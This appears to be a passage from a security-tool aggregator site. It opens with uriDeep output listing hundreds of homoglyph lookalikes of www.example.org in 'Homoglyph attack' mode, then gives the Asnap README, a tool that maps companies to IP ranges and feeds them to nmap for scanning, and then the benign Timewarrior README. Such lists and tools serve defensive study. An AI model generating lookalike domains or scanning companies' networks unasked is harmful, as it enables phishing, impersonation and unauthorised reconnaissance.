{'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampℐe.org'}
{'domain_punnycode': b'www.xn--exmple-cw8b.org', 'domain': 'www.exἊmple.org'}
{'domain_punnycode': b'www.xn--exampe-mk9b.org', 'domain': 'www.exampῚe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝚡ample.org'}
{'domain_punnycode': b'www.xn--xample-vy3w.org', 'domain': 'www.ꬲxample.org'}
{'domain_punnycode': b'www.xn--eample-is4v.org', 'domain': 'www.eꓫample.org'}
{'domain_punnycode': None, 'domain': 'www.exampاe.org'}
{'domain_punnycode': b'www.xn--exampl-nq4c.org', 'domain': 'www.exampl⋿.org'}
{'domain_punnycode': b'www.xn--eample-ize.org', 'domain': 'www.eϰample.org'}
{'domain_punnycode': b'www.xn--exampl-1k4w.org', 'domain': 'www.examplᏋ.org'}
{'domain_punnycode': b'www.xn--exmple-qit.org', 'domain': 'www.exටmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝙀xample.org'}
{'domain_punnycode': b'www.xn--exmple-jta.org', 'domain': 'www.exàmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝑷le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝖑e.org'}
{'domain_punnycode': b'www.xn--xample-vo8d.org', 'domain': 'www.ⲉxample.org'}
{'domain_punnycode': b'www.xn--xample-v4a.org', 'domain': 'www.Ęxample.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.examplΕ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝗘xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝘹ample.org'}
{'domain_punnycode': b'www.xn--exmple-cbc.org', 'domain': 'www.exǣmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝖕le.org'}
{'domain_punnycode': b'www.xn--eample-p84d.org', 'domain': 'www.e⨰ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝑳e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖷ample.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝛆.org'}
{'domain_punnycode': b'www.xn--exampl-88b.org', 'domain': 'www.examplƎ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampℒe.org'}
{'domain_punnycode': b'www.xn--exmple-qhc.org', 'domain': 'www.exȂmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝔓le.org'}
{'domain_punnycode': b'www.xn--exampe-0va.org', 'domain': 'www.exampÌe.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝛦.org'}
{'domain_punnycode': b'www.xn--xample-h4a.org', 'domain': 'www.ėxample.org'}
{'domain_punnycode': b'www.xn--examle-sdf.org', 'domain': 'www.examϼle.org'}
{'domain_punnycode': b'www.3xample.org', 'domain': 'www.3xample.org'}
{'domain_punnycode': b'www.xn--exampe-mm4w.org', 'domain': 'www.exampᏓe.org'}
{'domain_punnycode': b'www.xn--exampl-8hc.org', 'domain': 'www.examplȅ.org'}
{'domain_punnycode': b'www.xn--exaple-5hu.org', 'domain': 'www.exa๓ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝓔.org'}
{'domain_punnycode': b'www.xn--exmple-xyc.org', 'domain': 'www.exƏmple.org'}
{'domain_punnycode': b'www.xn--exmple-j549a.org', 'domain': 'www.ex\U000104e0mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝕃e.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.examΡle.org'}
{'domain_punnycode': b'www.xn--eample-pr6a.org', 'domain': 'www.eᚷample.org'}
{'domain_punnycode': b'www.xn--exampie-cie.org', 'domain': 'www.exampİe.org'}
{'domain_punnycode': b'www.xn--exampl-u3a.org', 'domain': 'www.examplē.org'}
{'domain_punnycode': b'www.xn--eample-wy4a.org', 'domain': 'www.eᕽample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝕷e.org'}
{'domain_punnycode': b'www.xn--exampe-0ic.org', 'domain': 'www.exampȉe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝑋ample.org'}
{'domain_punnycode': b'www.xn--exmple-cua.org', 'domain': 'www.exämple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝔼.org'}
{'domain_punnycode': b'www.xn--xample-od4w.org', 'domain': 'www.Ꭷxample.org'}
{'domain_punnycode': b'www.xn--exampl-ghg.org', 'domain': 'www.examplҽ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝖊xample.org'}
{'domain_punnycode': b'www.xn--eample-3n9d.org', 'domain': 'www.eⴴample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝐩le.org'}
{'domain_punnycode': b'www.xn--exampe-tvb.org', 'domain': 'www.exampƚe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝔪ple.org'}
{'domain_punnycode': b'www.xn--exmple-4339a.org', 'domain': 'www.ex𐐂mple.org'}
{'domain_punnycode': b'www.xn--exaple-ym5a.org', 'domain': 'www.exaᗰple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝕡le.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampＩe.org'}
{'domain_punnycode': b'www.xn--exmple-cze7796c.org', 'domain': 'www.exᾈmple.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampⅠe.org'}
{'domain_punnycode': b'www.xn--eample-ww5d.org', 'domain': 'www.e⪤ample.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝝖mple.org'}
{'domain_punnycode': b'www.xn--exampe-7639a.org', 'domain': 'www.examp𐐹e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝚕e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝓍ample.org'}
{'domain_punnycode': b'www.xn--xample-hr4w.org', 'domain': 'www.ꮼxample.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝝬ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝗲xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝖾.org'}
{'domain_punnycode': b'www.xn--exmple-xmg.org', 'domain': 'www.exӘmple.org'}
{'domain_punnycode': b'www.xn--xample-vtf.org', 'domain': 'www.эxample.org'}
{'domain_punnycode': b'www.xn--exampe-t2c.org', 'domain': 'www.exampɬe.org'}
{'domain_punnycode': b'www.exaMple.org', 'domain': 'www.exaMple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝗣le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examplℯ.org'}
{'domain_punnycode': b'www.xn--exmple-4za.org', 'domain': 'www.exĀmple.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝞦ample.org'}
{'domain_punnycode': b'www.xn--exampl-u3a.org', 'domain': 'www.examplĒ.org'}
{'domain_punnycode': b'www.xn--exampl-1we.org', 'domain': 'www.examplΈ.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝐈e.org'}
{'domain_punnycode': b'www.xn--xample-hva.org', 'domain': 'www.êxample.org'}
{'domain_punnycode': b'www.xn--examle-6l6b.org', 'domain': 'www.examᵱle.org'}
{'domain_punnycode': b'www.exAmple.org', 'domain': 'www.exAmple.org'}
{'domain_punnycode': b'www.xn--exampl-8y8b.org', 'domain': 'www.examplἘ.org'}
{'domain_punnycode': b'www.xn--xample-9yc.org', 'domain': 'www.ℇxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝗲.org'}
{'domain_punnycode': b'www.xn--eample-ir3d.org', 'domain': 'www.e⤫ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝘔ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exaＭple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝗘.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝘭e.org'}
{'domain_punnycode': b'www.xn--exampe-fxe.org', 'domain': 'www.exampίe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝚙le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝑎mple.org'}
{'domain_punnycode': b'www.xn--exampl-gz8b.org', 'domain': 'www.examplἙ.org'}
{'domain_punnycode': b'www.xn--exampl-uva.org', 'domain': 'www.examplë.org'}
{'domain_punnycode': b'www.xn--exmple-q339a.org', 'domain': 'www.ex𐐨mple.org'}
{'domain_punnycode': b'www.xn--xample-o3a.org', 'domain': 'www.Ēxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ⅇxample.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝜧ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝖺mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝔸mple.org'}
{'domain_punnycode': b'www.xn--exampe-tf4w.org', 'domain': 'www.exampᎱe.org'}
{'domain_punnycode': b'www.xn--exaple-yx6a.org', 'domain': 'www.exaᛖple.org'}
{'domain_punnycode': b'www.xn--exampl-8hc.org', 'domain': 'www.examplȄ.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝜬le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝒍e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖃ample.org'}
{'domain_punnycode': b'www.xn--exampe-t9a.org', 'domain': 'www.exampıe.org'}
{'domain_punnycode': b'www.xn--examle-6t8d.org', 'domain': 'www.examⲣle.org'}
{'domain_punnycode': b'www.xn--exampe-m6b.org', 'domain': 'www.exampǐe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examplＥ.org'}
{'domain_punnycode': b'www.xn--exampl-gox.org', 'domain': 'www.examplၿ.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝝰mple.org'}
{'domain_punnycode': b'www.xn--exampe-m2c.org', 'domain': 'www.exampɫe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖝ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝔢xample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.Εxample.org'}
{'domain_punnycode': b'www.xn--xample-2y8b.org', 'domain': 'www.Ἐxample.org'}
{'domain_punnycode': b'www.xn--exaple-k1t.org', 'domain': 'www.exaฅple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝑨mple.org'}
{'domain_punnycode': b'www.xn--exmple-jw8b.org', 'domain': 'www.exἋmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝕄ple.org'}
{'domain_punnycode': b'www.xn--exaple-ky6v.org', 'domain': 'www.exaꙦple.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝞺le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝕸ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝔄mple.org'}
{'domain_punnycode': b'www.xn--exmple-cw49a.org', 'domain': 'www.ex\U000104b2mple.org'}
{'domain_punnycode': b'www.xn--exmple-xv8b.org', 'domain': 'www.exἈmple.org'}
{'domain_punnycode': b'www.xn--exmple-qhc.org', 'domain': 'www.exȃmple.org'}
{'domain_punnycode': b'www.xn--examle-erf.org', 'domain': 'www.examРle.org'}
{'domain_punnycode': b'www.xn--exampl-14a.org', 'domain': 'www.examplĘ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝐏le.org'}
{'domain_punnycode': b'www.xn--xample-oxc.org', 'domain': 'www.Ɓxample.org'}
{'domain_punnycode': b'www.xn--eample-bfg.org', 'domain': 'www.eҲample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.eⅩample.org'}
{'domain_punnycode': b'www.xn--exmple-xq4w.org', 'domain': 'www.exꮹmple.org'}
{'domain_punnycode': b'www.xn--exmple-x0a.org', 'domain': 'www.exĄmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝑿ample.org'}
{'domain_punnycode': b'www.xn--exmple-qlg.org', 'domain': 'www.exӒmple.org'}
{'domain_punnycode': b'www.xn--xample-vk4w.org', 'domain': 'www.ꮛxample.org'}
{'domain_punnycode': b'www.xn--xample-vwe.org', 'domain': 'www.Έxample.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exaΜple.org'}
{'domain_punnycode': b'www.xn--exampl-1t5a.org', 'domain': 'www.examplᘓ.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.exampΙe.org'}
{'domain_punnycode': b'www.xn--examle-6t8d.org', 'domain': 'www.examⲢle.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.examρle.org'}
{'domain_punnycode': b'www.xn--exampe-7oj.org', 'domain': 'www.examp۱e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝓜ple.org'}
{'domain_punnycode': b'www.xn--exampe-tvf.org', 'domain': 'www.exampіe.org'}
{'domain_punnycode': b'www.xn--xample-ofx.org', 'domain': 'www.ၔxample.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝕴e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝚇ample.org'}
{'domain_punnycode': b'www.xn--exmple-jua.org', 'domain': 'www.exÅmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝔛ample.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝝚.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝙀.org'}
{'domain_punnycode': b'www.xn--exmple-4f5c.org', 'domain': 'www.ex⍺mple.org'}
{'domain_punnycode': b'www.xn--exaple-r3c.org', 'domain': 'www.exaɱple.org'}
{'domain_punnycode': b'www.ex4mple.org', 'domain': 'www.ex4mple.org'}
{'domain_punnycode': b'www.xn--eample-wv5b.org', 'domain': 'www.eᳳample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝐦ple.org'}
{'domain_punnycode': b'www.xn--exampe-tvb.org', 'domain': 'www.exampȽe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.example.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.exαmple.org'}
{'domain_punnycode': b'www.xn--eample-bsf.org', 'domain': 'www.eхample.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝜜mple.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝖨e.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampℹe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝕒mple.org'}
{'domain_punnycode': b'www.xn--xample-hmg.org', 'domain': 'www.Ӗxample.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝝡ple.org'}
{'domain_punnycode': b'www.xn--example-0ma.org', 'domain': 'www.exampŀe.org'}
{'domain_punnycode': b'www.xn--exmple-xmg.org', 'domain': 'www.exәmple.org'}
{'domain_punnycode': b'www.xn--exampe-to4w.org', 'domain': 'www.exampᏞe.org'}
{'domain_punnycode': b'www.xn--exmple-c639a.org', 'domain': 'www.ex𐐵mple.org'}
{'domain_punnycode': b'www.xn--exmple-45b.org', 'domain': 'www.exǍmple.org'}
{'domain_punnycode': b'www.examplc.org', 'domain': 'www.examplⅽ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝑒xample.org'}
{'domain_punnycode': b'www.xn--exampl-8of.org', 'domain': 'www.examplе.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝖆mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝙻e.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝚬xample.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝛸ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampｌe.org'}
{'domain_punnycode': b'www.eXample.org', 'domain': 'www.eXample.org'}
{'domain_punnycode': b'www.xn--exmple-48q.org', 'domain': 'www.exఞmple.org'}
{'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp𝟭e.org'}
{'domain_punnycode': b'www.xn--exmple-c65b.org', 'domain': 'www.exᴧmple.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝞛ple.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝙄e.org'}
{'domain_punnycode': b'www.xn--exampe-77a.org', 'domain': 'www.exampĩe.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝛂mple.org'}
{'domain_punnycode': b'www.xn--exmple-4v8b.org', 'domain': 'www.exἉmple.org'}
{'domain_punnycode': b'www.xn--eample-i84d.org', 'domain': 'www.e⨯ample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝜺xample.org'}
{'domain_punnycode': b'www.xn--xample-v339a.org', 'domain': 'www.𐐁xample.org'}
{'domain_punnycode': b'www.Example.org', 'domain': 'www.Example.org'}
{'domain_punnycode': b'www.xn--exaple-k8t.org', 'domain': 'www.exaศple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examℙle.org'}
{'domain_punnycode': b'www.xn--exampe-0cb.org', 'domain': 'www.exampĻe.org'}
{'domain_punnycode': b'www.xn--exmple-qze.org', 'domain': 'www.exΛmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝖒ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝙭ample.org'}
{'domain_punnycode': b'www.xn--exampl-nva.org', 'domain': 'www.examplê.org'}
{'domain_punnycode': b'www.xn--examle-zcf.org', 'domain': 'www.examϷle.org'}
{'domain_punnycode': b'www.xn--exmple-qwe.org', 'domain': 'www.exΆmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝑃le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝚎xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝙿le.org'}
{'domain_punnycode': b'www.xn--examle-e35b.org', 'domain': 'www.examᴘle.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝜲ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝘱le.org'}
{'domain_punnycode': b'www.xn--exaple-543w.org', 'domain': 'www.exaꭑple.org'}
{'domain_punnycode': b'www.xn--xample-h6e.org', 'domain': 'www.Ϝxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝚊mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝓧ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝗫ample.org'}
{'domain_punnycode': b'www.xn--exampe-f38d.org', 'domain': 'www.exampⳐe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝙇e.org'}
{'domain_punnycode': b'www.xn--exmple-ce5a.org', 'domain': 'www.exᗅmple.org'}
{'domain_punnycode': b'www.xn--exampe-to6a.org', 'domain': 'www.exampᚨe.org'}
{'domain_punnycode': b'www.xn--examle-ze5c.org', 'domain': 'www.exam⍴le.org'}
{'domain_punnycode': b'www.xn--examle-erf.org', 'domain': 'www.examрle.org'}
{'domain_punnycode': b'www.xn--exmple-j0a.org', 'domain': 'www.exĂmple.org'}
{'domain_punnycode': b'www.xn--exampl-8ua.org', 'domain': 'www.examplÈ.org'}
{'domain_punnycode': b'www.xn--exampe-m8a.org', 'domain': 'www.exampīe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝗆ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝗅e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝙥le.org'}
{'domain_punnycode': b'www.xn--exampl-gvf.org', 'domain': 'www.examplЄ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝖯le.org'}
{'domain_punnycode': b'www.xn--exampe-7db.org', 'domain': 'www.exampłe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝔁ample.org'}
{'domain_punnycode': b'www.exanple.org', 'domain': 'www.exanple.org'}
{'domain_punnycode': b'www.xn--example-0ma.org', 'domain': 'www.exampĿe.org'}
{'domain_punnycode': b'www.xn--exampe-005b.org', 'domain': 'www.exampᴌe.org'}
{'domain_punnycode': b'www.xn--exampl-nt4v.org', 'domain': 'www.examplꓰ.org'}
{'domain_punnycode': b'www.xn--exmple-cj9b.org', 'domain': 'www.exᾺmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝙈ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝑬.org'}
{'domain_punnycode': b'www.xn--exampe-fxe.org', 'domain': 'www.exampΊe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝖤.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝐞xample.org'}
{'domain_punnycode': b'www.exampl3.org', 'domain': 'www.exampl3.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝙼ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝒫le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝓟le.org'}
{'domain_punnycode': b'www.xn--eample-353w.org', 'domain': 'www.eꭖample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ℰxample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.εxample.org'}
{'domain_punnycode': b'www.xn--exampl-uh6v.org', 'domain': 'www.examplꘓ.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝟈le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝘅ample.org'}
{'domain_punnycode': b'www.xn--exmple-chc.org', 'domain': 'www.exȁmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝑀ple.org'}
{'domain_punnycode': b'www.xn--exaple-5p4v.org', 'domain': 'www.exaꓟple.org'}
{'domain_punnycode': b'www.xn--exampl-8of.org', 'domain': 'www.examplЕ.org'}
{'domain_punnycode': b'www.xn--xample-28b.org', 'domain': 'www.Ǝxample.org'}
{'domain_punnycode': b'www.xn--exampe-tr4w.org', 'domain': 'www.exampᏭe.org'}
{'domain_punnycode': b'www.ex@mple.org', 'domain': 'www.ex@mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝒎ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝓹le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝒆xample.org'}
{'domain_punnycode': b'www.xn--exmple-qt5a.org', 'domain': 'www.exᘒmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝖾xample.org'}
{'domain_punnycode': b'www.xn--xample-hq4c.org', 'domain': 'www.⋿xample.org'}
{'domain_punnycode': b'www.xn--exampe-0kg.org', 'domain': 'www.exampӏe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝔭le.org'}
{'domain_punnycode': b'www.xn--exampe-fjc.org', 'domain': 'www.exampȊe.org'}
{'domain_punnycode': b'www.xn--exampl-u739a.org', 'domain': 'www.exampl𐐔.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝘐e.org'}

mindcrypt@kali:~/tool/uriDeep# python3 uriDeep.py -l -H -d www.example.org

            _    ___
 /\ /\ _ __(_)  /   \___  ___ _ __
/ / \ \ '__| | / /\ / _ \/ _ \ '_ \
\ \_/ / |  | |/ /_//  __/  __/ |_) |
 \___/|_|  |_/___,' \___|\___| .__/
                             |_|

 Version Beta
 Authors: Alfonso Muñoz (@mindcrypt)
          Miguel Hernández (@MiguelHzBz)

Domain target: www.example.org
Option selected: Homoglyph attack
Option selected: Lite confusables
Generate similar domains...
Similars domains to example: 5
{'domain': 'www.exąmple.org', 'domain_punnycode': b'www.xn--exmple-x0a.org'}
{'domain': 'www.examplę.org', 'domain_punnycode': b'www.xn--exampl-14a.org'}
{'domain': 'www.exampļe.org', 'domain_punnycode': b'www.xn--exampe-0cb.org'}
{'domain': 'www.ęxample.org', 'domain_punnycode': b'www.xn--xample-v4a.org'}
{'domain': 'www.example.org', 'domain_punnycode': b'www.example.org'}
root@kali:~/tool/uriDeep#

Download uriDeep

↧

Asnap - Tool To Render Recon Phase Easier By Providing Updated Data About Which Companies Owns Which Ipv4 Or Ipv6 Addresses

October 3, 2020, 4:30 am

≫ Next: Timewarrior - Commandline Time Reporting

≪ Previous: uriDeep - Unicode Encoding Attacks With Machine Learning

Asnap aims to render recon phase easier by providing regularly updated data about which companies owns which ipv4 or ipv6 addresses and allows the user to automate initial port and service scanning.

█████╗ ███████╗███╗   ██╗ █████╗ ██████╗ 
██╔══██╗██╔════╝████╗  ██║██╔══██╗██╔══██╗
███████║███████╗██╔██╗ ██║███████║██████╔╝
██╔══██║╚════██║██║╚═█╗██║██╔══██║██╔═══╝ 
██║  ██║███████║██║ ╚████║██║  ██║██║     
╚═╝  ╚═╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     									
	Author : Mehmet Berkay Yuksel | twitter -> @paradoxxer

Demo

Installation

Precompiled Binary

If you have Go installed and configured in your $PATH enviroment variable, simply run:

go get -u github.com/paradoxxer/asnap

If you want to use precompiled binary, you also need to download "move.sh" and "nmap.sh" files and place them in the same directory with asnap.

To download the database that asnap searches from, you need to provide a key. To get your free key, sign up here -> https://www.maxmind.com/en/geolite2/signup after signing up navigate -> services -> My license key and create new key. Then create "asnap_conf.txt" inside the same directory with asnap, and paste your key to first line of "asnap_conf.txt":

echo 'insert key' > asnap_conf.txt

To be able to use port scanning functionality, you need to install nmap to your machine:

* Debian Based Distros:
    sudo apt install nmap
* MacOS
    brew install nmap 
* Arch Based Distros
    sudo pacman -S nmap

Build Yourself (Recommended)

Download the source code:

git clone git@github.com:paradoxxer/asnap.git

Install golang here -> https://golang.org/doc/install or you can install go if it is available in your package manager:

sudo apt install golang

After downloading the source code, navigate through the project directory and run:

go build

This will produce asnap binary. After you build it, create asnap_conf.txt inside the same directory with the asnap, insert your key to first line and you are good to go.

echo 'insert key' > asnap_conf.txt

Usage and Examples

Usage of ./asnap:
-download               Download database for the first usage.
-update                 Update downloaded database. (Geolite databases updates once a week.).
-search                 Specify search.
-ipv4                   Specify ipv4 database to search.
-ipv6                   Specify ipv6 database to search.
-company                Search by company name.
-asn                    Search by as number.
-outfile                Specifies a name for the output text. By default, output file is named: MM-DD-YYYY_out.txt
-infile                 Use specified .txt file as input. Asnap will iterate every line, and treats them as company names and searches specified database with given inputs.
-nmap                   Passes found ip addresses to nmap.

Examples:
"$asnap -download" -> Downloads database with given key, for the first time.
"$asnap -update" -> Updates database.
"$asnap -search -ipv4 -com   pany="example" " -> Search ipv4 database by company name "example"
"$asnap -search -ipv6 -asn 13337" -> Search ipv6 database by as number "13337"
"$asnap -search -ipv4 -company="github" -outfile /path/to/output/file" -> Search ipv4 database by company name "test" and save output to specified path.
"$asnap -search -ipv4 -infile /path/to/input/file.txt -nmap" -> Give a list of company names as input, search it inside ipv4 database and pass found ip addresses to nmap for port scanning.

Use Cases:

While you can use asnap manually, you can automate this whole process with cron jobs(see -> https://en.wikipedia.org/wiki/Cron). For example after you supplied an input file with -infile argument, All you have to do is check the output file and regularly modify input file to your needs. By default output file named: "MM-DD-YYYY_out.txt".

Follow Me:

If you have a question or a feature that you want me to add feel free to contact me. twitter -> https://twitter.com/paradoxxer linkedin -> https://www.linkedin.com/in/mehmet-berkay-y%C3%BCksel-ab78aa153/ Web Site -> https://yukselberkay.me

Download Asnap

↧

Timewarrior - Commandline Time Reporting

October 3, 2020, 1:30 pm

≫ Next: AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING

≪ Previous: Asnap - Tool To Render Recon Phase Easier By Providing Updated Data About Which Companies Owns Which Ipv4 Or Ipv6 Addresses

Timewarrior is a time tracking utility that offers simple stopwatch features as well as sophisticated calendar-based backfill, along with flexible reporting. It is a portable, well supported and very active Open Source project.

Installing

From Package

Thanks to the community, there are binary packages available here.

Building Timewarrior

Building Timewarrior yourself requires

git
cmake
make
C++ compiler, currently gcc 4.8.1+ or clang 3.3+ for full C++11 support
Python 3, for running the testsuite

There are two ways to retrieve the Timewarrior sources:

Clone the repository from Github,

git clone --recurse-submodules https://github.com/GothenburgBitFactory/timewarrior
cd timewarrior

Or download the tarball with curl,

curl -O https://taskwarrior.org/download/timew-1.3.0.tar.gz

and expand the tarball

tar xzf timew-1.3.0.tar.gz
cd timew-1.3.0

Build Timewarrior, optionally run the test suite (note: the tarball does not contain tests), and install it.

cmake -DCMAKE_BUILD_TYPE=release
make
[make test]
sudo make install

This copies files into the right place (default under /usr/local), and installs man pages.

Add the optional parameter -DCMAKE_INSTALL_PREFIX=/path/to/your/install/location to the cmake command if you want to install Timewarrior at a location other than /usr/local. The make install command may not require sudo depending on your choice of install location.

Documentation

There is extensive online documentation. You'll find all the details at timewarrior.net/docs/.

There you will find the documentation, downloads, news and more.

Contributing

Your contributions are especially welcome. Whether it comes in the form of code patches, ideas, discussion, bug reports, encouragement or criticism, your input is needed.

For support options, take a look at CONTRIBUTING.md or visit taskwarrior.org.

Visit Github and participate in the future of Timewarrior.

Download Timewarrior

↧

